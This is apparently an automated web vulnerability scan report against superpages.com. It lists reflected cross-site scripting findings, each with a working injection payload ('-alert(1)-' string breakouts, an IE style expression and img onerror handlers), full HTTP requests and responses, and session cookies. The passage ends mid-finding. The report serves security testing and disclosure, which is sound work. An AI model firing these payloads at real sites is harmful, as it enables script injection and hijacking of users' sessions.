HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/ Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:29:25 GMT Content-Length: 66686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... ype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:57 GMT Content-Length: 66498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... tp://yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'ht ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/ Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:33 GMT Content-Length: 126537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ww.superpages.com"; s.prop5 = "Advanced Search, Business Profile"; s.prop9 = "Advanced Search"; s.eVar23 = "Advanced Search"; s.hier1 = "Advanced Search, Business Profile"; var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516"; if(s_campaign){ s.campaign = s_campaign; } var s_code = s.t(); if(s_code) document.writeln(s_code); //--> ...[SNIP]...
The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750439498-www.superpages.com-4789827-628076; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:19 GMT; Path=/ Set-Cookie: JSESSIONID=8C15D1E521D5C7BAD68D0A53F9577955; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:18 GMT Content-Length: 128435
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toBusinesses&SRC=comlocal1a8c3a4"style="x:expression(alert(1))"d28cbb2cb02" rel="nofollow" onClick="clickTrackTabs('GT','MySuperpages', 'yp_profile');"> ...[SNIP]...
The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/ Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:23 GMT Connection: close Content-Length: 23380
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/ Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:03 GMT Content-Length: 66496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... archtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/ Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:28:30 GMT Content-Length: 60956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank - Handlin ...[SNIP]... = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
4.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/ Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:30:48 GMT Content-Length: 23390
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... pe="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:03:55 GMT Content-Length: 57628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
4.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 74692 Date: Thu, 03 Feb 2011 17:09:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
...[SNIP]... var hostServ = 'http://www.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:45 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:46GMT Content-Length: 58480 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y ...[SNIP]... <h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:36 GMT Server: Unspecified Vary: Host Last-Modified: Thu, 03 Feb 2011 17:07:36GMT Content-Length: 59492 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages"> ...[SNIP]...
4.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/yellowpages/C-Banks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
